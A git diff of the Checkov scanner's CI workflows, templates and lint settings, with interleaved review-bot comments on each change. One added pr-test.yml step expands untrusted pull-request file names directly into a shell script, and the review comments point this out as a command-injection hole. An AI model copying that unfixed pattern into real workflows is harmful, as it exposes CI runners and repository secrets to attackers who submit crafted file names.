diff --git a/.flake8 b/.flake8 index a9e6889a854..02cc05f1ba5 100644 --- a/.flake8 +++ b/.flake8 @@ -3,7 +3,7 @@ [flake8] max-line-length = 120 # E203,E501 don't work with black together -ignore = E203,E501,E731,W503,W504,DUO107,DUO104,DUO130,DUO109,DUO116,B028,B950,TC001,TC003,TC006,B907,B038 +ignore = E203,E501,E731,W503,W504,DUO107,DUO104,DUO130,DUO109,DUO116,B028,B950,TC001,TC003,TC006,B907,B038,B909 select = C,E,F,W,B,B9,A,TC extend-exclude = .github, .pytest_cache, docs/*, venv/*, tests/*, flake8_plugins/*, cdk_integration_tests/src/python/* diff --git a/.github/ISSUE_TEMPLATE/feature_request.md b/.github/ISSUE_TEMPLATE/feature_request.md new file mode 100644 index 00000000000..6ac906daf1a --- /dev/null +++ b/.github/ISSUE_TEMPLATE/feature_request.md @@ -0,0 +1,21 @@ +--- +name: Feature request +about: Feature requests or requests for enhancements that are not bugs. +title: '' +labels: 'contribution requested' +assignees: '' + +--- + +**Describe the feature** + +Explain the feature in detail. Note that feature requests are always reviewed, but prioritized based on popularity, effort, and impact. We also welcome contributions. + +**Examples** + +Please share an example code sample (in the IaC of your choice) + expected inputs and outputs from Checkov + the expected outcomes. + +**Additional context** + +Add any other context about the problem here. + diff --git a/.github/PULL_REQUEST_TEMPLATE.md b/.github/PULL_REQUEST_TEMPLATE.md index 454ae46a0e7..7ae57a793cc 100644 --- a/.github/PULL_REQUEST_TEMPLATE.md +++ b/.github/PULL_REQUEST_TEMPLATE.md 
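Review bot: Adding B909 to the repo-wide `ignore` list in .flake8 silences the check for the whole codebase rather than at the sites that triggered it; if this is bugbear's "loop iterable edited while iterating" rule, that is a class of real bugs worth keeping visible. Prefer a per-line `# noqa: B909` at the offending sites, or, if the rule is too noisy here, a comment on the `ignore` line recording why it is excluded, e.g. `# B909: <reason for repo-wide exclusion>`, so the next person does not have to rediscover it.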
@@ -2,14 +2,14 @@ [//]: # " # PR Title - Be aware that we use the title to create changelog automatically and therefore only allow specific prefixes - - break: to indicate a breaking change, this supersedes any of the types + We use the title to create changelog automatically and therefore only allow specific prefixes + - break: to indicate a breaking change, this supersedes any of the other types - feat: to indicate new features or checks - fix: to indicate a bugfix or handling of edge cases of existing checks - docs: to indicate an update to our documentation - chore: to indicate adjustments to workflow files or dependency updates - platform: to indicate a change needed for the platform - Additionally a scope is needs to be added to the prefix, which indicates the targeted framework, in doubt choose 'general'. + Each prefix should be accompanied by a scope that specifies the targeted framework. If uncertain, use 'general'. # Allowed prefixs: ansible|argo|arm|azure|bicep|bitbucket|circleci|cloudformation|dockerfile|github|gha|gitlab|helm|kubernetes|kustomize|openapi|sast|sca|secrets|serverless|terraform|general|graph|terraform_plan|terraform_json @@ -34,10 +34,8 @@ Fixes # (issue) ## Checklist: -- [ ] My code follows the style guidelines of this project - [ ] I have performed a self-review of my own code - [ ] I have commented my code, particularly in hard-to-understand areas - [ ] I have made corresponding changes to the documentation - [ ] I have added tests that prove my feature, policy, or fix is effective and works - [ ] New and existing tests pass locally with my changes -- [ ] Any dependent changes have been merged and published in downstream modules diff --git a/.github/checkov.yaml b/.github/checkov.yaml index 558676fd686..5428125e94e 100644 --- a/.github/checkov.yaml +++ b/.github/checkov.yaml 
@@ -12,7 +12,6 @@ skip-path: - tests/common/utils/conftest.py - tests/common/utils/test_secrets_utils.py - tests/sca_image/conftest.py -- tests/sca_package/conftest.py - tests/sca_package_2/conftest.py - tests/secrets - tests/terraform/checks/provider @@ -22,8 +21,18 @@ skip-path: - tests/terraform/runner/tf_plan_skip_check_regex/resource/tfplan1.json - tests/terraform/runner/tfplan2.json - tests/unit/test_secrets.py +- tests/terraform/runner/resources/example/example.tf +- tests/terraform/graph +- tests/terraform/checks +- /checkov/secrets/plugins/entropy_keyword_combinator.py +- /checkov/secrets/plugins/detector_utils.py +- /cdk_integration_tests/src/python/RedshiftClusterPubliclyAccessible/pass.py +- /cdk_integration_tests/src/python/RedshiftClusterEncryption/pass.py +- /cdk_integration_tests/src/python/RedshiftClusterEncryption/fail__1__.py +- /cdk_integration_tests/src/python/RedshiftClusterPubliclyAccessible/fail__1__.py - /cdk_integration_tests/src/python/ElasticacheReplicationGroupEncryptionAtTransitAuthToken/fail__2__.py - /cdk_integration_tests/src/python/ElasticacheReplicationGroupEncryptionAtTransitAuthToken/pass.py +- /cdk_integration_tests/src/typescript - /checkov/cdk/checks/python/GlueDataCatalogEncryption.yaml - /checkov/cdk/checks/python/GlueDataCatalogEncryption.yaml - /checkov/cdk/checks/python/GlueDataCatalogEncryption.yaml diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml index 48b57ad370b..5219680ac25 100644 --- a/.github/workflows/build.yml +++ b/.github/workflows/build.yml 
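Review bot: The new `skip-path` entries mix two path forms — relative (`tests/terraform/graph`, `tests/terraform/checks`) and root-anchored (`/checkov/secrets/plugins/...`, `/cdk_integration_tests/src/typescript`) — in a list whose earlier entries are all relative, so it is unclear whether the leading slash means something to the matcher or is just inconsistent; settle on one form for the whole list. Several additions also widen the dogfood scan's exclusions from individual fixtures to whole directories and to scanner source files (`entropy_keyword_combinator.py`, `detector_utils.py`); a short comment per group stating why it is excluded (presumably fixture files and keyword/regex tables that trip the secrets detector — to be confirmed) would keep the list from growing silently. The three identical `/checkov/cdk/checks/python/GlueDataCatalogEncryption.yaml` context lines are pre-existing duplicates that could be collapsed in the same change.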
@@ -44,12 +44,12 @@ jobs: strategy: fail-fast: true matrix: - python: ["3.8", "3.9", "3.10", "3.11", "3.12"] + python: ["3.10", "3.11", "3.12"] os: [ubuntu-latest, macos-latest, windows-latest] runs-on: ${{ matrix.os }} steps: - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v3 - - uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c # v4 + - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f # v4 with: python-version: ${{ matrix.python }} - uses: actions/setup-node@b39b52d1213e96004bfcb1c61a8a6fa8ab84f3e8 # v3 
@@ -92,13 +92,67 @@ jobs: - name: Run integration tests run: | pipenv run pytest integration_tests + + integration-tests-old-python: + strategy: + fail-fast: true + matrix: + python: ["3.8", "3.9"] + os: [ubuntu-latest, macos-12, windows-latest] + runs-on: ${{ matrix.os }} + steps: + - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v3 + - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f # v4 + with: + python-version: ${{ matrix.python }} + - uses: actions/setup-node@b39b52d1213e96004bfcb1c61a8a6fa8ab84f3e8 # v3 + - uses: azure/setup-helm@5119fcb9089d432beecbf79bb2c7915207344b78 # v3 + with: + token: ${{ secrets.GITHUB_TOKEN }} + - uses: imranismail/setup-kustomize@a76db1c6419124d51470b1e388c4b29476f495f1 # v2 + if: ${{ runner.os != 'windows' }} + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + - name: Install pipenv + run: | + python -m pip install --no-cache-dir --upgrade pipenv + - name: Build & install checkov package + run: | + # remove venv, if exists + pipenv --rm || true + pipenv --python ${{ matrix.python }} + pipenv run pip install pytest pytest-xdist setuptools wheel + pipenv run python setup.py sdist bdist_wheel + bash -c 'pipenv run pip install dist/checkov-*.whl' + - name: Clone Terragoat - vulnerable terraform + run: git clone https://github.com/bridgecrewio/terragoat + - name: Clone Cfngoat - vulnerable cloudformation + run: git clone https://github.com/bridgecrewio/cfngoat + - name: Clone Kubernetes-goat - vulnerable kubernetes + run: git clone https://github.com/madhuakula/kubernetes-goat + - name: Clone kustomize-goat - vulnerable kustomize + run: git clone https://github.com/bridgecrewio/kustomizegoat + - name: Create checkov reports + run: | + # Just making sure the API key tests don't run on PRs + bash -c './integration_tests/prepare_data.sh "${{ matrix.os }}" "${{ matrix.python }}"' + env: + LOG_LEVEL: INFO + BC_KEY: ${{ secrets.PRISMA_KEY_API2 }} + PRISMA_API_URL: ${{ secrets.PRISMA_API_URL_2 }} + 
TF_REGISTRY_TOKEN: ${{ secrets.TFC_TOKEN }} + GITHUB_PAT: ${{ secrets.GITHUB_TOKEN }} + - name: Run integration tests + run: | + pipenv run pytest integration_tests + prisma-tests: runs-on: [ self-hosted, public, linux, x64 ] env: PYTHON_VERSION: "3.8" steps: - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v3 - - uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c # v4 + - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f # v4 with: python-version: ${{ env.PYTHON_VERSION }} - name: Install pipenv @@ -126,13 +180,13 @@ jobs: strategy: fail-fast: true matrix: - python: ["3.8", "3.12"] + python: ["3.10", "3.11", "3.12"] os: [ubuntu-latest, macos-latest] runs-on: ${{ matrix.os }} continue-on-error: true # for now it is ok to fail steps: - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v3 - - uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c # v4 + - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f # v4 with: python-version: ${{ matrix.python }} - name: Install pipenv 
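Review bot: `integration-tests-old-python` reproduces the `integration-tests` job step for step, differing only in the `python` matrix and the `macos-12` runner, so the two copies will drift over time (the `sast-integration-tests-old-python` hunk later in this file has the same shape); a single job whose `strategy.matrix.include` pairs `3.8`/`3.9` with `macos-12`, or a reusable workflow taking the matrix as input, keeps one definition. Within the new job the reports step exports `BC_KEY` while the SAST jobs in this file export `BC_API_KEY`; if `prepare_data.sh` reads one specific name (not visible here), the other is dead. The goat repositories are cloned at whatever their default branch currently points to, so an upstream change alters the scanned input; `git clone --depth 1` followed by a checkout of a pinned ref (`<PINNED_COMMIT>` placeholder) would make the expected report counts reproducible.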
@@ -161,6 +215,47 @@ jobs: - name: Run integration tests run: | pipenv run pytest sast_integration_tests + + sast-integration-tests-old-python: + strategy: + fail-fast: true + matrix: + python: ["3.8", "3.9"] + os: [ubuntu-latest, macos-12] + runs-on: ${{ matrix.os }} + continue-on-error: true # for now it is ok to fail + steps: + - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v3 + - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f # v4 + with: + python-version: ${{ matrix.python }} + - name: Install pipenv + run: | + python -m pip install --no-cache-dir --upgrade pipenv + - name: Build & install checkov package + run: | + # remove venv, if exists + pipenv --rm || true + pipenv --python ${{ matrix.python }} + pipenv run pip install pytest pytest-xdist setuptools wheel + pipenv run python setup.py sdist bdist_wheel + bash -c 'pipenv run pip install dist/checkov-*.whl' + - name: Clone flask - Python repo for SAST + run: git clone https://github.com/pallets/flask + - name: Clone WebGoat - Java repo for SAST + run: git clone https://github.com/WebGoat/WebGoat + - name: Clone axios - JavaScript repo for SAST + run: git clone https://github.com/axios/axios + - name: Create checkov reports + env: + LOG_LEVEL: INFO + BC_API_KEY: ${{ secrets.PRISMA_KEY_API2 }} + PRISMA_API_URL: ${{ secrets.PRISMA_API_URL_2 }} + run: bash -c './sast_integration_tests/prepare_data.sh' + - name: Run integration tests + run: | + pipenv run pytest sast_integration_tests + unit-tests: timeout-minutes: 30 runs-on: ubuntu-latest @@ -169,7 +264,7 @@ jobs: steps: - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v3 - name: Set up Python ${{ env.PYTHON_VERSION }} - uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c # v4 + uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f # v4 with: python-version: ${{ env.PYTHON_VERSION }} - uses: azure/setup-helm@5119fcb9089d432beecbf79bb2c7915207344b78 # v3 
@@ -194,7 +289,7 @@ jobs: run: | pipenv run python -m pytest tests bump-version: - needs: [integration-tests, unit-tests, prisma-tests] # add 'sast-integration-tests' when ready + needs: [integration-tests, unit-tests, prisma-tests, sast-integration-tests, integration-tests-old-python, sast-integration-tests-old-python] runs-on: [self-hosted, public, linux, x64] environment: release permissions: @@ -215,7 +310,7 @@ jobs: gpg_private_key: ${{ secrets.GPG_PRIVATE_KEY }} passphrase: ${{ secrets.PASSPHRASE }} - name: Set up Python ${{ env.PYTHON_VERSION }} - uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c # v4 + uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f # v4 with: python-version: ${{ env.PYTHON_VERSION }} - name: Install pipenv diff --git a/.github/workflows/codeql-analysis.yml b/.github/workflows/codeql-analysis.yml index ba981e5a428..7db98566c7a 100644 --- a/.github/workflows/codeql-analysis.yml +++ b/.github/workflows/codeql-analysis.yml @@ -36,7 +36,7 @@ jobs: - name: Checkout repository uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v3 - name: Set up Python - uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c # v4 + uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f # v4 with: python-version: '3.10' - name: Setup python for CodeQL 
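Review bot: `bump-version` now lists `sast-integration-tests` and `sast-integration-tests-old-python` in `needs`, but both jobs carry `continue-on-error: true` (the "for now it is ok to fail" lines in the earlier hunks of this file), so a failing SAST run still reports success and never blocks the release; the removed `# add 'sast-integration-tests' when ready` comment was conveying exactly that caveat. Either drop `continue-on-error` from those jobs so the dependency actually gates, or keep a comment on the `needs` line, e.g. `# sast jobs are continue-on-error and do not gate the release`, so readers do not assume the release is protected by them.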
@@ -54,12 +54,12 @@ jobs: pipenv lock -r > requirements.txt pip install -r requirements.txt - name: Initialize CodeQL - uses: github/codeql-action/init@e5f05b81d5b6ff8cfa111c80c22c5fd02a384118 # v2 + uses: github/codeql-action/init@2d790406f505036ef40ecba973cc774a50395aac # v2 with: languages: python setup-python-dependencies: false config-file: ./.github/codeql-config.yml - name: Autobuild - uses: github/codeql-action/autobuild@e5f05b81d5b6ff8cfa111c80c22c5fd02a384118 # v2 + uses: github/codeql-action/autobuild@2d790406f505036ef40ecba973cc774a50395aac # v2 - name: Perform CodeQL Analysis - uses: github/codeql-action/analyze@e5f05b81d5b6ff8cfa111c80c22c5fd02a384118 # v2 + uses: github/codeql-action/analyze@2d790406f505036ef40ecba973cc774a50395aac # v2 diff --git a/.github/workflows/coverage.yaml b/.github/workflows/coverage.yaml index 6d89d565555..5850c4ee538 100644 --- a/.github/workflows/coverage.yaml +++ b/.github/workflows/coverage.yaml @@ -27,7 +27,7 @@ jobs: gpg_private_key: ${{ secrets.GPG_PRIVATE_KEY }} passphrase: ${{ secrets.PASSPHRASE }} - name: Set up Python ${{ env.PYTHON_VERSION }} - uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c # v4 + uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f # v4 with: python-version: ${{ env.PYTHON_VERSION }} - uses: azure/setup-helm@5119fcb9089d432beecbf79bb2c7915207344b78 # v3 diff --git a/.github/workflows/jekyll-gh-pages.yml b/.github/workflows/jekyll-gh-pages.yml index 0b25f320ffc..2633b9148a7 100644 --- a/.github/workflows/jekyll-gh-pages.yml +++ b/.github/workflows/jekyll-gh-pages.yml 
@@ -29,9 +29,9 @@ jobs: - name: Checkout uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v3 - name: Setup Pages - uses: actions/configure-pages@1f0c5cde4bc74cd7e1254d0cb4de8d49e9068c7d # v3 + uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v3 - name: Build with Jekyll - uses: actions/jekyll-build-pages@e4ef22193c23ea849fc3fea6dbce69da1ee65b6d # v1 + uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 with: source: ./docs destination: ./_site diff --git a/.github/workflows/nightly.yml b/.github/workflows/nightly.yml index 96203f1c1a6..aa74e94a2ab 100644 --- a/.github/workflows/nightly.yml +++ b/.github/workflows/nightly.yml @@ -94,7 +94,7 @@ jobs: with: fetch-depth: 0 token: ${{ secrets.GITHUB_TOKEN }} - - uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c # v4 + - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f # v4 with: python-version: ${{ env.PYTHON_VERSION }} - name: Install pipenv @@ -128,7 +128,7 @@ jobs: with: upload_url: ${{ needs.github-release.outputs.upload_url }} asset_path: checkov.zip - asset_name: checkov_${{ matrix.name }}_X86_64_${{ needs.github-release.outputs.version }}.zip + asset_name: checkov_${{ matrix.name }}_X86_64.zip asset_content_type: application/zip build-release-artifact-linux-arm: needs: [ github-release ] @@ -164,5 +164,5 @@ jobs: with: upload_url: ${{ needs.github-release.outputs.upload_url }} asset_path: checkov.zip - asset_name: checkov_linux_arm64_${{ needs.github-release.outputs.version }}.zip + asset_name: checkov_linux_arm64.zip asset_content_type: application/zip diff --git a/.github/workflows/pipenv-update.yml b/.github/workflows/pipenv-update.yml index 98be69ccc12..b0a78f60a27 100644 --- a/.github/workflows/pipenv-update.yml +++ b/.github/workflows/pipenv-update.yml 
@@ -26,7 +26,7 @@ jobs: with: gpg_private_key: ${{ secrets.GPG_PRIVATE_KEY }} passphrase: ${{ secrets.PASSPHRASE }} - - uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c # v4 + - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f # v4 with: python-version: ${{ env.PYTHON_VERSION }} - name: Install pipenv @@ -42,7 +42,7 @@ jobs: GITHUB_TOKEN: ${{ secrets.PAT_TOKEN }} - name: Create Pull Request id: cpr - uses: peter-evans/create-pull-request@153407881ec5c347639a548ade7d8ad1d6740e38 # v5 + uses: peter-evans/create-pull-request@c5a7806660adbe173f04e3e038b0ccdcd758773c # v5 with: token: ${{ secrets.PAT_TOKEN }} title: '[AUTO-PR] Update pipenv packages' diff --git a/.github/workflows/pr-test.yml b/.github/workflows/pr-test.yml index 7d8032e1a92..b7f9506f581 100644 --- a/.github/workflows/pr-test.yml +++ b/.github/workflows/pr-test.yml 
@@ -35,15 +35,29 @@ jobs: PYTHON_VERSION: "3.8" steps: - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v3 - - uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c # v4 + - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f # v4 with: python-version: ${{ env.PYTHON_VERSION }} - - name: Install cfn-lint + - name: Get changed CFN test files + id: changed-files-specific + uses: tj-actions/changed-files@eaf854ef0c266753e1abec356dcf17d92695b251 # v44 + with: + files: tests/cloudformation/checks/resource/aws/**/* + - name: Filter YAML and JSON files + if: steps.changed-files-specific.outputs.any_changed == 'true' + id: filter-files run: | - pip install -U cfn-lint - - name: Lint Cloudformation templates + YAML_JSON_FILES=$(echo ${{ steps.changed-files-specific.outputs.all_changed_files }} | tr ' ' '\n' | grep -E '\.ya?ml$|\.json$' | tr '\n' ' ') + if [ -n "$YAML_JSON_FILES" ]; then + echo "YAML_JSON_FILES=$YAML_JSON_FILES" >> "$GITHUB_ENV" + fi + - name: Install cfn-lint & Lint Cloudformation templates + if: env.YAML_JSON_FILES != '' run: | - cfn-lint tests/cloudformation/checks/resource/aws/**/* -i W + pip install -U cfn-lint + for file in $YAML_JSON_FILES; do + cfn-lint "$file" -i W + done mypy: uses: bridgecrewio/gha-reusable-workflows/.github/workflows/mypy.yaml@main @@ -60,7 +74,7 @@ jobs: steps: - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v3 - name: Set up Python ${{ matrix.python }} - uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c # v4 + uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f # v4 with: python-version: ${{ matrix.python }} allow-prereleases: true 
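Review bot: In the `Filter YAML and JSON files` step, `${{ steps.changed-files-specific.outputs.all_changed_files }}` is expanded into the shell script text before it runs, so a file name in the PR containing shell metacharacters (backticks, `$(...)`, `;`) becomes part of the script; on a `pull_request`-triggered workflow that list is untrusted input. Pass the output through an `env:` entry and reference it as a quoted variable instead, which makes it data rather than code. The `for file in $YAML_JSON_FILES` loop in the next step still word-splits on spaces, so names containing spaces will not be linted correctly; a newline-separated list consumed with `while IFS= read -r` would handle that, though it may be acceptable for a fixture directory.
```yaml
      - name: Filter YAML and JSON files
        if: steps.changed-files-specific.outputs.any_changed == 'true'
        id: filter-files
        env:
          ALL_CHANGED_FILES: ${{ steps.changed-files-specific.outputs.all_changed_files }}
        run: |
          YAML_JSON_FILES=$(echo "$ALL_CHANGED_FILES" | tr ' ' '\n' | grep -E '\.ya?ml$|\.json$' | tr '\n' ' ')
          # … unchanged: write YAML_JSON_FILES to $GITHUB_ENV …
```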
@@ -115,12 +129,67 @@ jobs: strategy: fail-fast: true matrix: - python: ["3.8", "3.9", "3.10", "3.11", "3.12"] + python: ["3.10", "3.11", "3.12"] os: [ubuntu-latest, macos-latest, windows-latest] runs-on: ${{ matrix.os }} steps: - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v3 - - uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c # v4 + - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f # v4 + with: + python-version: ${{ matrix.python }} + allow-prereleases: true + cache: "pipenv" + cache-dependency-path: "Pipfile.lock" + - uses: actions/setup-node@b39b52d1213e96004bfcb1c61a8a6fa8ab84f3e8 # v4 + - uses: azure/setup-helm@5119fcb9089d432beecbf79bb2c7915207344b78 # v3 + with: + token: ${{ secrets.GITHUB_TOKEN }} + - uses: imranismail/setup-kustomize@a76db1c6419124d51470b1e388c4b29476f495f1 # v2 + if: ${{ runner.os != 'windows' }} + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + - name: Install pipenv + run: | + python -m pip install --no-cache-dir --upgrade pipenv + - name: Build & install checkov package + shell: bash + run: | + # remove venv, if exists + pipenv --rm || true + pipenv --python ${{ matrix.python }} + pipenv run pip install pytest pytest-xdist setuptools wheel + pipenv run python setup.py sdist bdist_wheel + bash -c 'pipenv run pip install dist/checkov-*.whl' + - name: Clone Terragoat - vulnerable terraform + run: git clone https://github.com/bridgecrewio/terragoat + - name: Clone Cfngoat - vulnerable cloudformation + run: git clone https://github.com/bridgecrewio/cfngoat + - name: Clone Kubernetes-goat - vulnerable kubernetes + run: git clone https://github.com/madhuakula/kubernetes-goat + - name: Clone kustomize-goat - vulnerable kustomize + run: git clone https://github.com/bridgecrewio/kustomizegoat + - name: Create checkov reports + env: + LOG_LEVEL: INFO + BC_KEY: ${{ secrets.PRISMA_KEY_API2 }} + PRISMA_API_URL: ${{ secrets.PRISMA_API_URL_2 }} + run: | + # Just making sure the API key 
tests don't run on PRs + bash -c './integration_tests/prepare_data.sh ${{ matrix.os }} 3.8' + - name: Run integration tests + run: | + pipenv run pytest integration_tests -k 'not api_key' + + integration-tests-old-python: + strategy: + fail-fast: true + matrix: + python: ["3.8", "3.9"] + os: [ubuntu-latest, macos-12, windows-latest] + runs-on: ${{ matrix.os }} + steps: + - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v3 + - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f # v4 with: python-version: ${{ matrix.python }} allow-prereleases: true 
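Review bot: The `Create checkov reports` step calls `prepare_data.sh ${{ matrix.os }} 3.8` with a hard-coded Python version while the job's matrix is now `3.10`–`3.12`, and the equivalent step in build.yml passes `"${{ matrix.python }}"`; if the script uses that argument to select expected outputs (not visible here), every matrix leg is prepared as 3.8. The arguments are also unquoted here but quoted in build.yml. Suggested line: `bash -c './integration_tests/prepare_data.sh "${{ matrix.os }}" "${{ matrix.python }}"'`. The `integration-tests-old-python` job that begins at the end of this hunk continues outside it.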
@@ -170,12 +239,60 @@ jobs: strategy: fail-fast: true matrix: - python: ["3.8", "3.12"] + python: ["3.12"] os: [ubuntu-latest, macos-latest] runs-on: ${{ matrix.os }} steps: - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v3 - - uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c # v4 + - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f # v4 + with: + python-version: ${{ matrix.python }} + allow-prereleases: true + cache: "pipenv" + cache-dependency-path: "Pipfile.lock" + - name: Install pipenv + run: | + python -m pip install --no-cache-dir --upgrade pipenv + - name: Build & install checkov package + run: | + # remove venv, if exists + pipenv --rm || true + pipenv --python ${{ matrix.python }} + pipenv run pip install pytest pytest-xdist setuptools wheel + pipenv run python setup.py sdist bdist_wheel + bash -c 'pipenv run pip install dist/checkov-*.whl' + - name: Clone flask - Python repo for SAST + run: git clone https://github.com/pallets/flask + - name: Clone WebGoat - Java repo for SAST + run: git clone https://github.com/WebGoat/WebGoat + - name: Clone axios - JavaScript repo for SAST + run: git clone https://github.com/axios/axios + - name: Create checkov reports + env: + LOG_LEVEL: INFO + BC_API_KEY: ${{ secrets.PRISMA_KEY_API2 }} + PRISMA_API_URL: ${{ secrets.PRISMA_API_URL_2 }} + if: env.BC_API_KEY != null + run: bash -c './sast_integration_tests/prepare_data.sh' + - name: Run integration tests + env: + LOG_LEVEL: INFO + BC_API_KEY: ${{ secrets.PRISMA_KEY_API2 }} + PRISMA_API_URL: ${{ secrets.PRISMA_API_URL_2 }} + if: env.BC_API_KEY != null + run: | + pipenv run pytest sast_integration_tests + + sast-integration-tests-old-python: + strategy: + fail-fast: true + matrix: + python: ["3.8"] + os: [ubuntu-latest, macos-12] + runs-on: ${{ matrix.os }} + steps: + - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v3 + - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f # v4 
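Review bot: The `Create checkov reports` and `Run integration tests` steps each repeat the same three-entry `env:` block and the same `if: env.BC_API_KEY != null` guard; hoisting the `env:` to the job level and keeping only the `if:` on the steps removes the duplication (the cdk-integration-tests hunk that follows has the same pattern). The PR-side matrices also cover less than build.yml's — `["3.12"]` here versus `["3.10", "3.11", "3.12"]`, and `["3.8"]` versus `["3.8", "3.9"]` for the old-python job — which may be intentional to keep PR runs short, but a comment saying so would stop someone from "fixing" it. `sast-integration-tests-old-python` begins at the end of this hunk and continues outside it.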
with: python-version: ${{ matrix.python }} allow-prereleases: true @@ -218,12 +335,54 @@ jobs: strategy: fail-fast: true matrix: - python: ["3.8", "3.12"] + python: ["3.12"] os: [ubuntu-latest, macos-latest] runs-on: ${{ matrix.os }} steps: - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v3 - - uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c # v4 + - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f # v4 + with: + python-version: ${{ matrix.python }} + allow-prereleases: true + cache: "pipenv" + cache-dependency-path: "Pipfile.lock" + - name: Install pipenv + run: | + python -m pip install --no-cache-dir --upgrade pipenv + - name: Build & install checkov package + run: | + # remove venv, if exists + pipenv --rm || true + pipenv --python ${{ matrix.python }} + pipenv run pip install pytest pytest-xdist setuptools wheel + pipenv run python setup.py sdist bdist_wheel + bash -c 'pipenv run pip install dist/checkov-*.whl' + - name: Create checkov reports + env: + LOG_LEVEL: INFO + BC_API_KEY: ${{ secrets.PRISMA_KEY_API2 }} + PRISMA_API_URL: ${{ secrets.PRISMA_API_URL_2 }} + if: env.BC_API_KEY != null + run: bash -c './cdk_integration_tests/prepare_data.sh' + - name: Run integration tests + env: + LOG_LEVEL: INFO + BC_API_KEY: ${{ secrets.PRISMA_KEY_API2 }} + PRISMA_API_URL: ${{ secrets.PRISMA_API_URL_2 }} + if: env.BC_API_KEY != null + run: | + pipenv run pytest cdk_integration_tests + + cdk-integration-tests-old-python: + strategy: + fail-fast: true + matrix: + python: ["3.8"] + os: [ubuntu-latest, macos-12] + runs-on: ${{ matrix.os }} + steps: + - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v3 + - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f # v4 with: python-version: ${{ matrix.python }} allow-prereleases: true 
@@ -263,7 +422,7 @@ jobs: runs-on: [self-hosted, public, linux, x64] steps: - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v3 - - uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c # v4 + - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f # v4 with: python-version: ${{ env.PYTHON_VERSION }} cache: "pipenv" @@ -318,7 +477,7 @@ jobs: WORKING_DIRECTORY: ./dogfood_tests steps: - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v3 - - uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c # v4 + - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f # v4 with: python-version: ${{ env.PYTHON_VERSION }} cache: "pipenv" diff --git a/.github/workflows/security-shared.yml b/.github/workflows/security-shared.yml index ba5474c27e7..74510c01e9b 100644 --- a/.github/workflows/security-shared.yml +++ b/.github/workflows/security-shared.yml @@ -18,7 +18,7 @@ jobs: with: ref: ${{ github.event.pull_request.head.sha }} - name: security test - uses: jpetrucciani/bandit-check@0a848ad401dadaf2937e4c9cc9a4eeeea2d0b5df # v1 + uses: jpetrucciani/bandit-check@74c5ecc4297e374c7e9283bc81f649287bb14f34 # v1 with: path: 'checkov' trufflehog-secrets: diff --git a/.gitpod.Dockerfile b/.gitpod.Dockerfile index 4fb679f5d3a..5b4c88fc5f3 100644 --- a/.gitpod.Dockerfile +++ b/.gitpod.Dockerfile @@ -1,5 +1,5 @@ FROM 